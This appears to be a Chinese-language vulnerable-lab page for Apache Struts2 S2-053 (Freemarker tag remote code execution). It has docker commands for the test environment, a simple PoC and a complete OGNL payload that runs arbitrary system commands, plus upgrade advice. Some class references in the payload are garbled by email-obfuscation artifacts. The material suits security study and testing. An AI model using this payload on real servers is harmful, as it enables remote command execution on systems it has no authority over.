Struts2 Freemarker tags 远程代码执行漏洞(S2-053)环境

漏洞信息

获取环境:

  1. 拉取镜像到本地

    $ docker pull medicean/vulapps:s_struts2_s2-053
  2. 启动环境

    $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-053

    -p 80:8080 前面的 80 代表物理机的端口,可随意指定。

使用与利用

访问 http://你的 IP 地址:端口号/

PoC

  1. 访问 Demo 页面, 随便输入值,可看到页面输出我们提交的值

  2. 在输入框中输入 %{100-3},然后提交,发现 %{} 中的表达式被执行

Exp

命令执行 Exp(有回显):

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@[email protected](#process.getInputStream()))}

替换Exp中的 (#cmd='whoami') 中的命令即可

修复建议

升级Apache struts 至 2.5.12 版本 或者 2.3.34 版本

参考链接

Copied From: Medicean/VulApps/s/struts2/s2-053